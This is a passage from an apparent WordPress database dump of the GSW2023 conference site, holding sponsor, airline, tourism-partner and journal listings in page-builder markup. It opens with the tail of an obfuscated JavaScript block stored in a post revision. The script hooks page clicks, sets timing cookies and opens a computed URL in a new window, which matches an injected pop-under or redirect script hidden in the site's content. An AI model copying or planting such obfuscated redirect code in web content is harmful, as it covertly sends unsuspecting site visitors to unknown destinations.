Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:24:10','2023-08-16 00:24:10','',3066,'https://gsw2023.com/?p=5246',0,'revision','',0),
(5247,1,'2023-08-16 00:24:42','2023-08-16 00:24:42','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145375034{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The 